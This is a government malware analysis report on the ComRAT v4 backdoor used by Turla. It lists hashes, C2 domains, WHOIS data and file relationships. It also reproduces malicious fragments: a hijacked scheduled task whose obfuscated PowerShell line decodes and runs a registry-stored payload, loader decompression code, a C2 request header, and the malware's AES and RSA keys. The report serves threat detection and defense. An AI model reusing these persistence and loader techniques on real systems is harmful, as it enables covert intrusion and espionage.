Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

1-888-282-0870
CISA Service Desk (UNCLASS)
CISA SIPR (SIPRNET)
CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

Web: https://malware.us-cert.gov
E-Mail: [email protected]
FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

 

This product is provided subject to this Notification and this Privacy & Use policy.Original release date: October 29, 2020

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware variant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA, CNMF, and FBI are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

FBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.

This report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link library (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs used as communication modules. The communication module (32-bit or 64-bit DLL) is injected into the victim systemís default browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The named pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and exfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which includes the configuration and logs files.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https://us-cert.cisa.gov/

For a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix.

Submitted Files (5)

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll)

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1)

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll)

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe)

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1)

Domains (6)

branter.tk

bronerg.tk

crusider.tk

duke6.tk

sanitar.ml

wekanda.tk

Findings

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

Tags

dropper

Details
Name corrected.ps1
Size 4345430 bytes
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, LF line terminators
MD5 65419948186842f8f3ef07cafb71f59a
SHA1 93537b0814177e2101663306aa17332b9303e08a
SHA256 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
SHA512 83d093c6febacb11fcde57fee98c2385f628e5cd3629bfabd0f9e4d2c5de18c6336b3d3aff8081b06a827e742876d19ae370e81890c247daac73d4f8b7ea5f90
ssdeep 24576:+vq2EYNg0gX792UHDoSe9Ov2a8p+JnHZUoWYWUpcfm3WuPhu/aqJOFKs4Wuw054o:Drr9q0v4ubJmg4OFuwkOM5NZihxs
Entropy 4.004402
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
1349191514… Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
Description

This file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into a registry on the victim system. This malicious script also modifies the following scheduled task on the victim’s system:

—Begin Modified Scheduled Task—
C:WindowsSystem32TasksMicrosoftWindowsCustomer Experience Improvement ProgramConsolidator
—End Modified Scheduled Task—

The modification of this scheduled task causes the installed malicious PowerShell script to be executed. Displayed below is the original scheduled task:

—Begin Original Scheduled Task—
<?xml version=”1.0″ encoding=”UTF-16″?>
<Task xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
<RegistrationInfo>
   <Version>1.0</Version>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
   <Source>$(@%systemRoot%system32wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%system32wsqmcons.exe,-108)</Author>
   <Description>$(@%systemRoot%system32wsqmcons.exe,-107)</Description>
   <URI>MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator</URI>
</RegistrationInfo>
<Principals>
   <Principal id=”WinSQMAccount”>
    <UserId>S-1-5-18</UserId>
   </Principal>
</Principals>
<Settings>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <StartWhenAvailable>true</StartWhenAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
   <TimeTrigger>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Repetition>
       <Interval>PT6H</Interval>
    </Repetition>
   </TimeTrigger>
</Triggers>
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>%SystemRoot%System32wsqmcons.exe</Command>
   </Exec>
</Actions>
</Task>
—End Original Scheduled Task—

The scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task:

—Begin Modified Scheduled Task—
<?xml version=”1.0″ encoding=”UTF-16″?>
<Task version=”1.3″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
<RegistrationInfo>
   <Source>$(@%systemRoot%system32wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%system32wsqmcons.exe,-108)</Author>
   <Version>1.0</Version>
   <Description>$(@%systemRoot%system32wsqmcons.exe,-107)</Description>
   <URI>MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator</URI>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
   <TimeTrigger>
    <Repetition>
       <Interval>PT6H</Interval>
       <StopAtDurationEnd>false</StopAtDurationEnd>
    </Repetition>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Enabled>true</Enabled>
   </TimeTrigger>
   <LogonTrigger>
    <Enabled>true</Enabled>
   </LogonTrigger>
</Triggers>
<Principals>
   <Principal id=”WinSQMAccount”>
    <RunLevel>LeastPrivilege</RunLevel>
    <UserId>SYSTEM</UserId>
   </Principal>
</Principals>
<Settings>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <AllowHardTerminate>true</AllowHardTerminate>
   <StartWhenAvailable>true</StartWhenAvailable>
   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <AllowStartOnDemand>true</AllowStartOnDemand>
   <Enabled>true</Enabled>
   <Hidden>false</Hidden>
   <RunOnlyIfIdle>false</RunOnlyIfIdle>
   <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
   <WakeToRun>false</WakeToRun>
   <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
   <Priority>7</Priority>
</Settings>
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c “%SystemRoot%System32wsqmcons.exe &amp; PowerShell.exe -v 2 “$GS459ea = ‘KVYYOBBA4331110uhyicnoor’;
[Text.Encoding]::ASCII.GetString([Convert]::”Fr`omBa`se6`4Str`ing”((gp HKLM:SOFTWAREMicrosoftSQMClientWindows).WSqmCons))|iex;
“”</Arguments>
   </Exec>
</Actions>
</Task>
—End Modified Scheduled Task—

   The modification of the scheduled task illustrated below indicates the primary purpose of this task modification is to decode and execute a PowerShell script contained within the registry key HKLM:SOFTWAREMicrosoftSQMClientWindows = WSqmCons:

—Begin Specific Scheduled Task Module—
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c “%SystemRoot%System32wsqmcons.exe &amp; PowerShell.exe -v 2 “$GS459ea = ‘KVYYOBBA4331110uhyicnoor’;
[Text.Encoding]::ASCII.GetString([Convert]::”Fr`omBa`se6`4Str`ing”((gp HKLM:SOFTWAREMicrosoftSQMClientWindows).WSqmCons))|iex;
“”</Arguments>
—End Specific Scheduled Task Module—

This malicious script installs a PowerShell script (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WsqmCons” registry key. The primary purpose of the newly installed PowerShell is to decode and load a malicious DLL, identified as ComRat v4 (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) onto the victim’s system.

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

Tags

trojan

Details
Name Decode_PowerShell.ps1
Size 1264496 bytes
Type ASCII text, with very long lines, with CRLF, LF line terminators
MD5 0fd79f4c60593f6aae69ff22086c3bb0
SHA1 07f0692c856703d75a9946a0fbb3c0db03f7ac40
SHA256 a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
SHA512 28a0ae0a779aa88499f70cf97ef9db9482527017ea76ee2e469e4184684c4d4fb0559e50f1721e7e9d02655bee4cdf7b12c62a3d037ea10130121cfbb772e250
ssdeep 24576:jarQlVyeHtWdf7PyJjwLKWp57+7fb0TLaB7VrE:jD567vs1tm
Entropy 6.091278
Antivirus
Antiy GrayWare/PowerShell.Mimikatz.a
ClamAV Win.Trojan.PSempireInj-7013548-0
Microsoft Security Essentials Trojan:PowerShell/Powersploit.J
NANOAV Trojan.Script.ExpKit.eydujq
Symantec Hacktool.Mimikatz
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
a3170c32c0… Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
a3170c32c0… Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
Description

This heavily encoded PowerShell script is installed by the malicious script “corrected.ps1” (134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an embedded DLL which has been identified as a variant of the malware known as ComRat v4 “ComRATv4.exe (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316).

Removal of some of the PowerShell obfuscation reveals the functions illustrated below. These functions are used to decompress the embedded DLL, before it is loaded on the target system:

—Begin PowerShell Helper Functions—
   using System;
   using System.IO;
   using System.IO.Compression;

   public static class CD475bjf{
       public static void DBQ800fc(Stream input, Stream output){byte[] buffer = new byte[16 * 1024];
       int bytesRead;
       while((bytesRead = input.Read(buffer, 0, buffer.Length)) > 0){
           output.Write(buffer, 0, bytesRead);
       }}}
   
   public static class MAE38aee{
   
       public static byte[] JZ653jdh(byte[] arrayToCompress){
           using (MemoryStream outStream = new MemoryStream()){using (GZipStream tinyStream = new GZipStream(outStream, CompressionMode.Compress))using (MemoryStream mStream = new MemoryStream(arrayToCompress))CD475bjf.DBQ800fc(mStream, tinyStream);
       return outStream.ToArray();
   }}
   
       public static byte[] PGN255ij(byte[] arrayToDecompress){        
           using (MemoryStream inStream = new MemoryStream(arrayToDecompress))using (GZipStream bigStream = new GZipStream(inStream, CompressionMode.Decompress))using (MemoryStream bigStreamOut = new MemoryStream()){CD475bjf.DBQ800fc(bigStream, bigStreamOut);
       return bigStreamOut.ToArray();
   }}}

#decode base64 above
$decompress = [Convert]::FromBase64String($decompressbase64);

#create another text object for use later
$NS70gea = New-Object System.Text.ASCIIEncoding;

#convert base64 decoded value to string
$decompress = $NS70gea.GetString($decompress,0,$decompress.Length);
—End PowerShell Helper Functions—

Figure 1 illustrates a part of the payload embedded within this malicious script. The encoded PowerShell script contains an embedded function named “Run”, that can load a DLL directly from memory and inject it into a remote process (Figure 2). The PowerShell script injects the embedded ComRAT DLL (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process.

Screenshots

Figure 1 - Screenshot of the payload embedded within this malicious script.

Figure 1 – Screenshot of the payload embedded within this malicious script.

Figure 2 - Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.

Figure 2 – Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

Tags

trojan

Details
Name ComRATv4.exe
Size 1827840 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 faaafa3e115033ba5115ed6a6ba59ba9
SHA1 ca16a95cd38707bad2dc524bb3086b3c0cb3e372
SHA256 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
SHA512 6f2fe02c1e15be2409f89ff1e6ae3c78f87e242ee448fe5ff6d375a74f10c7c6cc01f3f6d796aa34599a891e03c5d421d10f0c041e5a6dc0e346aea3ae21a935
ssdeep 49152:jTRjrgdOU9p1PZH/JNTFTJT5dwIwzQJH:PRCBNTBwAH
Entropy 6.463931
Antivirus
Ahnlab Trojan/Win64.Turla
ESET a variant of Win64/Turla.BX trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:38:38-05:00
Import Hash d9d661a606c9d1c23b47672d1067de68
PE Sections
MD5 Name Raw Size Entropy
11525199e6e248e88e0529cf72a9002d header 1024 2.934959
0f3258519a92690d14406e141dcb285b .text 1027584 6.441800
fa4840dc4653443d4574486df39bc6a3 .rdata 481280 4.896843
ca22c78d526550925d7843a24cd1d266 .data 264704 7.368343
f7cc8fa49cfa87a125d8354082e162f3 .pdata 47104 6.030652
ef6fdd7440f36ba21373b4585a5c83e4 .rsrc 512 4.724729
4f16258cf938a4bc7fe0ae92121f442d .reloc 5632 5.425381
Relationships
44d6d67b53… Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
44d6d67b53… Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
44d6d67b53… Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
Description

This application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into Windows Explorer (Explorer.exe) by a ComRAT PowerShell loader (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim’s system daytime and it performs code execution between 9AM to 5PM Monday through Friday. During execution, it installs the following files into the %TEMP% folder:

–Begin files–
“%TEMP%iecache.bin” ==> an AES-256-XTS encrypted VFS FAT16 format, containing the malware configuration and the logs files. (The encryption key is generated during runtime and stored in the Windows registry).
“%TEMP%FSAPIDebugLogFile.txt
–End files–

The malware injects an embedded communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or (166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system’s default browser and executes it. This file and the communication module communicate with each other using a named pipe. The malware uses the named pipe to send HTTP requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use the Gmail web interface to receive commands and exfiltrate data.

Illustrated below are sample data observed in the decrypted VFS in FAT16 format. Some of these files can be updated in the VFS using backdoor commands.

–Begin sample data in the VFS —
“/etc/pal/” contains a list of C2 domains: “bronerg.tk|crusider.tk|duke6.tk”
“/etc/gal.bin” contains a list of C2 domains: “sanitar.ml|wekanda.tk|branter.tk”
“/etc/pki/aes_key.pki” : Contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications:

–Begin AES key–
4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1
–End AES key–

“/etc/pki/public_cert.pki” contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications:

–Begin RSA key–
BE51E00093CEB0A5FCAE59EB4EEEB3079D1CB17FC195321587CB513003826917B0BC13EB3B9A4209A4FFAF19C07249D360F447A6FAE3936612516A152619B800C4BE12FFF7077D7AF959ABBFD0A1BC06CD3B9D8DBC079307D79B78E4C7F114DE3B530DF40E40C14299D47CD6530A765B1F2717EAA66AD139B3F6728AFFFC5B6AB3E2B36FB062AD167E2B4450A295038A211E0A8E8BFE01FE338ACF883518099663E95B6266AB037224A32853002A47248012567455AC75939FDFC4018D86C2A6D72770887A8FE0678F5E7BC527FB4787D70923FC6909ACF8DC651F93B5E537ABF860B3262723FB2181E9132E381D892A8864BAB38687231B1E47C00BF10BC445010001
–End RSA key–

It uses the public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.
“/etc/mail/subj_dict” contains the the Subject “Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB |NM| n/m |N/M: |*n/m*”

“/etc/php_storage/GET/DEF/server.txt ” and “/etc/php_storage/POST/DEF/server.txt” contains server IP “172.22.150.125”.
–End sample data in the VFS —

Screenshots

Figure 3 - The first bytes of the decrypted VFS in FAT16 format.

Figure 3 – The first bytes of the decrypted VFS in FAT16 format.

Figure 4 - The decrypted VFS hierarchy, containing the malware configuration and the logs files.

Figure 4 – The decrypted VFS hierarchy, containing the malware configuration and the logs files.

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

Tags

backdoordownloaderloadertrojan

Details
Name Communication_module_32.dll
Size 61440 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 e509c3a40045d2dab9404240f3f201ed
SHA1 86f747cac3b16ed2dab6d9f72a347145ff7a850d
SHA256 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
SHA512 f78827b6fc258f4a63dd17fec2acb7114329a9d7fd426c72838f2e5e5c54c12fce7be7a0eb9c7e7e74b01fe80c42293ef89c3bcbafd230a68f9639e57f62bb6f
ssdeep 1536:zlAjaBOUFoD0C8YQ7aZS7C2kkAxWzg39xa3cdjrH++:zl2uOUG0CBQ7aZS7C3uzg39xEM
Entropy 5.338807
Antivirus
Antiy Trojan[Backdoor]/Win32.Turla
Avira TR/Crypt.XPACK.Gen3
ESET a variant of Win32/Turla.EO trojan
Ikarus Trojan-Downloader.Win32.Farfli
NANOAV Trojan.Win32.Turla.hlrzcr
Symantec Heur.AdvML.B
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:36:54-05:00
Import Hash 87ab41c57e95562a3e81f0609398b278
PE Sections
MD5 Name Raw Size Entropy
b9bd1636e8c11ff1ab2368771e89cfac header 4096 0.612975
077bf2412ba289da7b6261ffec65988d .text 49152 6.051754
1c95870051ff12b740487ff93d19ef3b .rdata 4096 0.317233
b86e403ac8c58a013fe4cda6b6715804 .reloc 4096 0.019202
Relationships
00352afc7e… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
00352afc7e… Connected_To branter.tk
00352afc7e… Connected_To wekanda.tk
00352afc7e… Connected_To sanitar.ml
00352afc7e… Connected_To duke6.tk
00352afc7e… Connected_To bronerg.tk
00352afc7e… Connected_To crusider.tk
Description

This application is a 32-bit Windows DLL that has been identified as the communication module injected into the victim’s system default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). It is designed to use the HTTP and a Gmail web interface for the C2. It attempts to connect to its C2 using secure connections.

–Begin list of domains–
bronerg.tk
crusider.tk
duke6.tk
sanitar.ml
wekanda.tk
branter.tk
–End list of domains–

Displayed below is sample request header:

–Begin header–
CONNECT bronerg[.]tk:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: bronerg.tk:443
Content-Length: 0
Connection: Keep-Alive
–End header–

bronerg.tk

Tags

command-and-control

Whois

Domain name:
    BRONERG.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
Description

ComRAT v4 C2 domain.

crusider.tk

Tags

command-and-control

Ports
  • 443 TCP
Whois

Domain name:
    CRUSIDER.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
Description

ComRAT v4 C2 domain.

duke6.tk

Tags

command-and-control

Whois

Domain name:
    DUKE6.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

sanitar.ml

Tags

command-and-control

Whois

Domain name:
    SANITAR.ML

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

wekanda.tk

Tags

command-and-control

Whois

Domain name:
    WEKANDA.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

branter.tk

Tags

command-and-control

Ports
  • 443 TCP
Whois

No Whois record at the time of analysis.

Relationships
branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Tags

trojan

Details
Name Communication_module_64.dll
Size 64000 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 54902e33dd6d642bc5530de33b19e43c
SHA1 a06f0e29fca6eb29bf5334fb3b84a872172b0e28
SHA256 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
SHA512 28b8f63af33f4aebd2b5b582750036db718f657640aca649d4b2b95188661da3834398a56184ee08f64ddf1d32198e722be46dbfbc78e49e0d276fe6c5234b94
ssdeep 1536:p2JmzHKhyOjQuCLA/9zYgJS7aWSXEuT2XWZdjoEGbgqPU6Izj6N1o6OtAEBiUm5+:p2JmcjQuCLA/VYgJS7H21yXQdj5G0qMy
Entropy 5.939047
Antivirus
ESET a variant of Win64/Turla.CN trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:37:48-05:00
Import Hash 87ab41c57e95562a3e81f0609398b278
PE Sections
MD5 Name Raw Size Entropy
199ab75383a70bd1148671ca1c689d0e header 1024 2.031353
46c52ca20a919c2314e32193eac9ec66 .text 60416 5.990363
a97e460909f791b5d0b571099a5b7b56 .rdata 1536 4.519592
c5ba9ad86e832155180da146aef6eabc .pdata 1024 3.061435
Relationships
166b1fb3d3… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
166b1fb3d3… Connected_To bronerg.tk
166b1fb3d3… Connected_To crusider.tk
166b1fb3d3… Connected_To duke6.tk
166b1fb3d3… Connected_To sanitar.ml
166b1fb3d3… Connected_To wekanda.tk
166b1fb3d3… Connected_To branter.tk
Description

This application is a 64-bit Windows DLL that has been identified as the communication module injected into the victim’s system default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). The DLL is similar to the 32-bit communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d).

Relationship Summary

1349191514… Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
a3170c32c0… Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
a3170c32c0… Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
44d6d67b53… Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
44d6d67b53… Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
44d6d67b53… Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
00352afc7e… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
00352afc7e… Connected_To branter.tk
00352afc7e… Connected_To wekanda.tk
00352afc7e… Connected_To sanitar.ml
00352afc7e… Connected_To duke6.tk
00352afc7e… Connected_To bronerg.tk
00352afc7e… Connected_To crusider.tk
bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
